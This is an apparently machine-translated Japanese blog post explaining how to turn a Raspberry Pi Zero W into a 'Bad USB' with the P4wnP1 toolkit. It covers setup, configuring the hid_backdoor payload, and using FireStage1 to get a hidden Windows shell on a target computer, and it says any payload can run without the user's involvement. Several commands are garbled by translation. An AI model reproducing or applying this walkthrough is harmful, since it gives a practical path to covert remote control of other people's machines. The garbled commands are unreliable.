ラズベリーパイの記事を長い間更新しておらず、気まぐれに悪いUSBを作りたいのですが、やってください! 2日前の結核の最後の手術の後、今日はすべてここにあり、製造プロセスは本当に紆余曲折ですが、幸いなことに最終的には修理されます。
コンピューターの目には、マウスとキーボードからの操作はウイルスではなく人間からのものであり、これらの操作はコンピューターによって無条件に受け入れられます。 また、Bad USBはこの論理的な抜け穴を悪用して、Bad USBデバイスを通常のキーボードまたはマウスに偽装し、ターゲットコンピューターで悪意のある操作を実行します。
理論的には、Bad USBは人間がコンピュータでできることは何でもできますが、唯一の欠点は、Bad USBをユーザーのコンピュータに接続して検出されないことです。
ラズベリーパイゼロまたはゼロW
8Gを超えるTFカード
ラズベリーパイゼロUSB OTGダイレクトケーブル
Windows または Linux コンピュータ
システムのダウンロードアドレス: https://www.raspberrypi.org/downloads/
プログラミングソフトウェア:ルーファス
書き込みが完了したら、ファイルマネージャーにブートパーティションを入力し、接尾辞を付けずに新しい空のsshファイルを作成します。
また、パーティションを起動し、新しいwpa_supplicant.confファイルを作成すると、内容は次のとおりです。
国=CN ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev update_config=1 ネットワーク={ ssid="ABCDEFG" #你的WiFi SSID psk="12345678" #你的WiFiパスワード key_mgmt=WPA-PSK 優先度 = 1 }
これがセットアップされると、ラズベリーパイはこのwifiに直接接続し、開始後にsshサービスをオンにすると、ルーターでラズベリーパイのIPを見つけて直接SSHで接続できます。
口座番号:円周率
パスワード:ラズベリー
/etc/apt/sources.list ファイルを編集します。
sudo nano /etc/apt/sources.list
すべてをコメントアウトし、以下を追加します。
Deb http://mirrors.ustc.edu.cn/raspbian/raspbian/ Jessie Main contrib non-free rpi
/etc/apt/sources.list.d/raspi.list ファイルを編集します。
sudo nano /etc/apt/sources.list.d/raspi.list
デブ http://mirrors.ustc.edu.cn/archive.raspberrypi.org/debian/ ジェシーメインUI
最後に、インデックスを更新し、依存関係を更新します。
sudo apt-get update & sudo apt-get upgrade -y
gitとJohnをインストールすることから始めます。
sudo apt-get install git john
githubからP4wnP1をダウンロードします。
git clone –再帰的な http://github.com/mame82/P4wnP1
ダウンロードが完了したら、次のコマンドを実行します。
cd P4wnP1 ./install.sh
この手順は異常に長い場合がありますが、操作する前に映画を見ることができます。 (壁のため、スクリプトのダウンロード操作はプロキシ233333経由しません。
画面にこの時間が表示されたら、すでにインストールされています。
"===========================================================================" 「エラーなしでここまで来たのなら、P4wnP1で行くのがいいはずです...」 "... そうでない場合は、申し訳ありませんが、これは進行中の作業であるため、あなたはあなた自身です」 "P4wnP1 をホストに接続すると、pi@172.16.0.1 で (RNDIS/CDC ECM 経由で) SSH 接続できるようになります" 「USB OTGアダプターを使用してキーボードを接続すると、P4wnP1はインタラクティブmodで起動します」 「Pi Zero Wを使用している場合は、WiFi APを開く必要があります。 AP を使用して P4wnP1 をセットアップすることもできます。 " 無線 LAN 名: P4wnP1" " キー: MaMe82-P4wnP1" " SSH アクセス: pi@172.24.0.1 (パスワード: ラズベリー)" "またはBluetooth NAP経由:pi@172.26.0.1(パスワード:ラズベリー)" "インストールディレクトリに移動します。 そこから、ファイル 'setup.cfg' の設定を変更できます。 "ペイロードと言語の選択のように""Pi Zero Wを使用している場合は、HIDバックドアを試してみてください;-)" 「今すぐPiを再起動する必要があります!」 "==========================================================================="
この時点で、P4wnP1フォルダーを入力してセットアップ.cfgファイルを変更すると、wifi名を設定して操作を開始できます。
まず、起動操作を変更する必要があり、セットアップ.cfgファイルに多くのスクリプトが組み込まれており、ファイルの最後に次のhid_backdoorをテストします。 (#コメントを使用するということは使用しないことを意味し、#のコメント解除は有効です。
ラズベリーパイを電源から切断し、ターゲットコンピューターに接続します。
ここで、P4wnP1のデフォルトのWiFi名はP4wnP1、パスワードはMaMe82-P4wnP1であり、後で変更し、WiFiに接続し、sshソフトウェアを使用して172.24.0.1、アカウント:「pi」パスワード:「ラズベリー」を入力することをお勧めします。
WiFiに3回接続しないと入らないのですが、どこが間違っているのかわかりません。
ログイン後、次のような画面が表示されます。 このインターフェイスに FireStage1 と入力します。
[クライアントが接続済み] と表示されます。
この時点で、シェルと入力してWindowsの背景シェルを取得することで、好きなことができます。
効果をテストするには、次のコマンドでブログのホームページを全画面で開きます。
非常に多くの写真がかなり退屈に思えたので、私はビデオを録画しました:(ビデオはYouTubeの壁を越える必要があります。
その点滅するコードはこれです:
$h=(get-process -id $pid)。 MainWindowHandle; $ios=[Runtime.InteropServices.HandleRef]; $hw=新規オブジェクト$ios (1,$h); $i=New-Object $ios (2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase"))。 GetType("MS. Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,-100,-100,80,80,16512)
しかし、私はそれが何を意味するのか理解していませんが、効果は非常にNBであり、無敵です。 ペイロードを任意のコードに変更することも、ユーザーの関与なしに起動直後にスクリプトを実行するように設定することもできます。
悪いことをしないでください、あなたが本当に悪いことをしたいのなら、 まず刑法第285条見てください、多分あなたはそれを読んだ後にそれをしたくないでしょう。
タイトル画像は南壁という非常に興味深いブログから侵入され、削除されました。
最も重要なことは、最後に、あなたの手で何も溶接しないでください、私のラズベリーパイは私の溶接によってほとんど損傷を受けました、幸いなことに私のテクニック(運)テクニック(気)エッセンス(極端な)ジャン(良い)、そうでなければそれは廃棄されます。
-EOF
リファレンス
ネットワークもアップグレードされ、機器のデバッグも行われましたが、外部ネットワーク上のローカル ファイルにアクセスしたい場合はどうすればよいですか?
「時代のほこりは人の山のようなものだ」という言葉は、実際にはカジュアルな表現ではありません。
それをオフにするちょっとしたトリックを見つけました。
ワードプレスの使い方のコツ
ブリージング ライトとスクリプトは以前に構成されており、現在は自動的に開始するように設定されています。 (ジェネリック)
目次
人気タグ
その他の言語
サイト情報